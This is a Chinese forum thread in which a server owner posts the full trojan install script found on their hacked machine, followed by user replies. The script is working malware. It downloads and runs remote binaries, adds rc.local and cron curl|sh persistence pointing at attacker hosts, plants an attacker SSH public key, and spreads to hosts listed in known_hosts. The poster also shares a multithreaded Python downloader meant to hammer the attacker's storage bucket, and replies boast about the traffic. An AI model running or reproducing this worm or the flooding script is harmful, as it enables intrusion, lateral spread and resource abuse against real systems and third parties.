class 大佬有话说 :
机器又被黑了,附上木马安装脚本,大家也自行检查下吧
本帖最后由 class 于 2020-4-7 22:48 编辑
20200407 22:47, 更新程序下载地址,可以继续刷了。(下方脚本已经更新)
https://apparel.oss-cn-hangzhou.aliyuncs.com/storefile/watch_Linux_x86_64
目前文件已经被删除,无法刷了。
突然检查到服务器又被黑,看了下还是这个"老朋友"的程序。
大家也可以按照脚本内容检查下自己的服务器。
木马程序目前是放在腾讯云的cos(你懂的),另外附赠一个多线程下载木马程序的脚本。
木马安装脚本
#!/bin/sh
#version
watchVersion="-5e4b58b"
nodeVersion="-5e4b58b"
#dealChattr
find /etc/cron*|xargs chattr -i
find /var/spool/cron*|xargs chattr -i
#directory
oldDirectory=$(pwd)
mkdir -p /tmp
chmod 1777 /tmp
cd /tmp
touch /var/tmp/writeable && cd /var/tmp/
touch /dev/shm/writeable && cd /dev/shm
touch ~/writeable && cd ~/
touch $oldDirectory/writeable && cd $oldDirectory
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /var/tmp/writeable ~/writeable$oldDirectory/writeable /dev/shm/writeable /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
currentDirectory=$(pwd)
#killPast
ps auxf| grep system-watch*| grep -v grep| grep -v system-watch$watchVersion| awk ‘{print $2}’| xargs kill -9
ps auxf| grep system-node*| grep -v grep| grep -v system-node$nodeVersion| awk ‘{print $2}’| xargs kill -9
#rm oldVersion
find system-watch* | grep -v system-watch$watchVersion | xargs rm
find system-node* | grep -v system-node$nodeVersion | xargs rm
ps -ef | grep "system-node" | grep -v "grep" | awk ‘{print $2}’ | xargs kill -9
#watchRun?
ps auxf | grep system-watch$watchVersion | grep -v grep
if [ $? -eq 0 ]
then
echo "watch running"
else
#updateNew
curl -fsSL https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/watch_linux_`uname -m` -o system-watch$watchVersion || wget https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/watch_linux_`uname -m` -O system-watch$watchVersion
chmod +x system-watch$watchVersion
$currentDirectory/system-watch$watchVersion
fi
#nodeRun?
ps auxf | grep system-node$nodeVersion | grep -v grep
if [ $? -eq 0 ]
then
echo "node running"
else
#updateNew
curl -fsSL https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/node_linux_`uname -m` -o system-node$nodeVersion || wget https://nba-1254105488.cos.ap-beijing-1.myqcloud.com/storefile/node_linux_`uname -m` -O system-node$nodeVersion
chmod +x system-node$nodeVersion
$currentDirectory/system-node$nodeVersion
fi
#rcLocal
if test -d /etc/rc.d/
then
echo "centos rc.local"
sed -i ‘/system-/d’ /etc/rc.d/rc.local
sed -i ‘/system_/d’ /etc/rc.d/rc.local
echo $currentDirectory/system-watch$watchVersion >> /etc/rc.d/rc.local
echo $currentDirectory/system-node$nodeVersion >> /etc/rc.d/rc.local
chmod +x /etc/rc.d/rc.local
else
echo "ubuntu rc.local"
sed -i ‘/system-/d’ /etc/rc.local
sed -i ‘/system_/d’ /etc/rc.local
echo $currentDirectory/system-watch$watchVersion >> /etc/rc.local
echo $currentDirectory/system-node$nodeVersion >> /etc/rc.local
chmod +x /etc/rc.local
fi
#cronTab
crontab -l| grep "https://app.lutai.network:33035/assets/node.sh" > /dev/null
if [ $? -eq 0 ]; then
echo "crontab found"
else
(crontab -l ; echo "*/60 * * * * (curl -fsSL https://app.lutai.network:33035/assets/node.sh||wget -q -O- https://app.lutai.network:33035/assets/node.sh||python -c ‘import urllib;print urllib.urlopen("https://app.lutai.network:33035/assets/node.sh").read()’)|sh >/dev/null 2>&1 &") | crontab –
fi
#sshPublicKey
if test -d ~/.ssh/
then
echo "ssh directory exist"
else
mkdir ~/.ssh/
fi
grep "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDc259umJoTtYTD3YoMbqz01lA9HUSp+h821nl/sMkQ5sS3Q2LMTjOkhhplUnCFdGVQ0TLxrpx/rsQH0CMw49axAQiqljToTo3MsF1h51PjpUGJCAoXghmp+Blh23J8RlwSVVEUBso2yTV3FjKNLnQ/rgmTzZ9lbsF+3YK7CrISKCbcTX2GjNY4GXjFDoswM89706l2tyjehYwYFHfY2Wkj/TRtEFUrKadoWaTEzbS8qyqln4iRnkO7lOZ+iLNsBewOA4TXLZr3FeZ59B0JkRzV6J8KLCon6wP+HI+SJao4KABEjsh0saZ7p0k1Ai9/FxNhLj/MOw1wL1yLDHdXwYFjkXJ3XErLnYZ+hb9JUP7zP9h35elYbZnRgDdnYDKHR7YIEXHiw3OVpwxQOmf2fWJoUo3E6FWt8PKgk28G5DsLMhAQk3QjXyyMI8TDEgtoF7znjxMrDWcGx/sIlKZlDX6Nk2NXsM/OwSpLeGeCRdRsHG3efwygMgILko+JRnbqyaA/MgCTDdgP032M0JINontq/1p6HtF0lSD4TsVx4T8PvZcyRK97hXYg1C9SoVNvx0O7jGUXVwwa2HOnIsIYc9WkRHChegBT2ruaSO8sip09NacDqcYpKeZ3TBziuR6RzyatXBQdBtZReGE5YDNxrLu89Mmfc7hY4P6ftjP7ETzjVQ==" ~/.ssh/authorized_keys > /dev/null
if [ $? -eq 0 ]; then
echo "ssh_rsa found"
else
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDc259umJoTtYTD3YoMbqz01lA9HUSp+h821nl/sMkQ5sS3Q2LMTjOkhhplUnCFdGVQ0TLxrpx/rsQH0CMw49axAQiqljToTo3MsF1h51PjpUGJCAoXghmp+Blh23J8RlwSVVEUBso2yTV3FjKNLnQ/rgmTzZ9lbsF+3YK7CrISKCbcTX2GjNY4GXjFDoswM89706l2tyjehYwYFHfY2Wkj/TRtEFUrKadoWaTEzbS8qyqln4iRnkO7lOZ+iLNsBewOA4TXLZr3FeZ59B0JkRzV6J8KLCon6wP+HI+SJao4KABEjsh0saZ7p0k1Ai9/FxNhLj/MOw1wL1yLDHdXwYFjkXJ3XErLnYZ+hb9JUP7zP9h35elYbZnRgDdnYDKHR7YIEXHiw3OVpwxQOmf2fWJoUo3E6FWt8PKgk28G5DsLMhAQk3QjXyyMI8TDEgtoF7znjxMrDWcGx/sIlKZlDX6Nk2NXsM/OwSpLeGeCRdRsHG3efwygMgILko+JRnbqyaA/MgCTDdgP032M0JINontq/1p6HtF0lSD4TsVx4T8PvZcyRK97hXYg1C9SoVNvx0O7jGUXVwwa2HOnIsIYc9WkRHChegBT2ruaSO8sip09NacDqcYpKeZ3TBziuR6RzyatXBQdBtZReGE5YDNxrLu89Mmfc7hY4P6ftjP7ETzjVQ==" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh/
fi
#bashRc
# echo "(curl -fsSL https://app.lutai.network:33035/assets/lutai||wget -q -O- https://app.lutai.network:33035/assets/lutai)|sh >/dev/null 2>&1 &" >> /etc/bashrc
#sshLogin
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "b({1,3}.){3}{1,3}b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL https://app.lutai.network:33035/assets/node.sh||wget -q -O- https://app.lutai.network:33035/assets/node.sh||python -c ‘import urllib;print urllib.urlopen("https://app.lutai.network:33035/assets/node.sh").read()’)|sh >/dev/null 2>&1 &" & done
fi
for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "b({1,3}.){3}{1,3}b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL https://app.lutai.network:33035/assets/node.sh||wget -q -O- https://app.lutai.network:33035/assets/node.sh||python -c ‘import urllib;print urllib.urlopen("https://app.lutai.network:33035/assets/node.sh").read()’)|sh >/dev/null 2>&1 &" & done
fi
fi
done
python3 木马下载脚本
使用方法
yum install -y python36 python36-devel screen
pip3 install requests
vi z.py # 把下面的内容粘贴进去
screen -S z # 创建一个远程会话
python3 z.py # 运行脚本
ps -ef | grep "z.py" | grep -v "grep" | awk ‘{print $2}’ | xargs kill -9 # 结束命令
#coding:utf-8
import requests
import threading
# 并发数
thread_max = threading.BoundedSemaphore(100)
curl = requests.session()
curl.timeout = 120
curl.headers = {
‘User-Agent’: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36’
}
class MyThread(threading.Thread):
def __init__(self):
# 重写写父类的__init__方法
super(MyThread, self).__init__()
self.url = ‘https://apparel.oss-cn-hangzhou.aliyuncs.com/storefile/watch_Linux_x86_64’
def run(self):
try:
url = self.url
if self.download(url):
print("下载成功: %s" % url)
else:
print("下载失败: %s" % url)
except Exception as e:
print(e)
pass
# 任务跑完移除线程
thread_max.release()
# 下载
def download(self, url):
try:
curl.get(url)
return True
except BaseException as e:
return False
# 开始操作
def start():
Thread_list = []
for url in range(1000000000):
# 如果线程达到最大值则等待前面线程跑完空出线程位置
thread_max.acquire()
p = MyThread()
p.start()
Thread_list.append(p)
for i in Thread_list:
i.join()
if __name__ == ‘__main__’:
start()
h20 大佬有话说 :
矿工进驻了吗?
skyboy0671 大佬有话说 :
学习了。。楼主分析出是怎么给你挂上去的吗??脚本??服务器ssh?
iamydp 大佬有话说 :
连代码都给出来了,那我3o就不客气了:lol
class 大佬有话说 :
skyboy0671 大佬有话说 : 2020-4-6 22:01
学习了。。楼主分析出是怎么给你挂上去的吗??脚本??服务器ssh?
之前是因为程序的漏洞通过调用curl 命令导致被挂马的。
还有一种就是 redis 对外开放且没设置密码。
刚发现的这台目前没分析出是什么时候被挂的。
故事霸霸 大佬有话说 :
本帖最后由 故事霸霸 于 2020-4-6 22:13 编辑
yc010t刷起来了
https://ae01.alicdn.com/kf/H189f5f45eda04181ab3cec9896edf415f.jpg
class 大佬有话说 :
iamydp 大佬有话说 : 2020-4-6 22:03
连代码都给出来了,那我3o就不客气了
资源是放在良心云COS的,3o在境外效果可能会差一些,用国内的机器会比较爽(不能用良心云)
她教我打狙 大佬有话说 :
mjj gogogo
故事霸霸 大佬有话说 :
yc010t文件删掉了,刷了大概5个t左右
姬长信 大佬有话说 :
故事霸霸 大佬有话说 : 2020-4-7 10:53
文件删掉了,刷了大概5个t左右
nbq